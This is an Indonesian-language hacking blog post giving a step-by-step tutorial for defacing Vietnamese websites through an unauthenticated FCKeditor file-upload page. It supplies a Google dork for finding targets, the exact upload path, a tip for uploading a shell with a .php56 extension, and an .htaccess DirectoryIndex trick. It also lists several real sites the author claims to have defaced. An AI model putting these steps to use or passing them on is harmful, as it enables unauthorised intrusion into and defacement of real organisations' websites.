Home exploit hacking Tutorial Deface VN FCKeditor Upload File/Shell Vulnerability

VN FCKeditor Upload File/Shell Vulnerability

Youe
LxSec Blog
Saturday, July 4, 2020
Yow Halo Exploiter, kali ini saya akan memberikan tutorial deface metode VN FCKeditor Upload File/Shell Vulnerability pada CMS DongDuong. proof VN FCKeditor ini masih tergolong proof baru bbrp tahun jadi masih bnyk target yang vulnerable. ok langsung saja.

Dorking Di google image dengan memasukkan dork : inurl:/vantindat/images site:vn ( kembangkan lagi ya )

disini saya memilih target yang ini ( http://compass.vn )
Deface Metode VN FCKeditor
setelah dibuka targetnya.. kalian masukkan exploit ini di akhir domain : /jscripts/FCKeditor/editor/filemanager/upload/test.html contoh : http://compass.vn/jscripts/FCKeditor/editor/filemanager/upload/test.html maka akan muncul sesuatu seperti gambar dibawah ini.
Tutorial Deface Metode VN FCKeditor
ok setelah itu kalian upload script deface, kalian bisa juga upload shell dengan extensi .php56
setelah di upload file akan diletakkan di /vantindat/images/NAMAFILEKAMU
berhubung webnya gagal di upshell saya upload file saja dan mengindex dirnya dengan .htaccess yang berisi
DirectoryIndex NamaScYangDiUpload.html
and Boom
VN FCKeditor Upload Shell/File Vurnelability
hasil saya :
http://www.compass.vn/vantindat/images/
http://skfoodtech.com.vn/vantindat/images/readme.htm
http://www.gaohoadang.com/vantindat/images/
https://www.nhuadinhhinh.com.vn/vantindat/images/readme.htm

Jika kurang Paham, Bisa liat video tutorial Di bawah.
btw saya belum pernah nyoba upload .htaccess yg membaca file .jpg / .png sebagai file .php kemudian upload shell jdi kalian coba sndiri



Referensi :
https://xsif.xaisyndicate.id/t/vn-fckeditor-bypass-upload-shell-unauthorized-file-insertation-vulnerability/145

Youe Saturday, July 4, 2020 Tags: exploit, hacking, Tutorial Deface

LihatTutupKomentar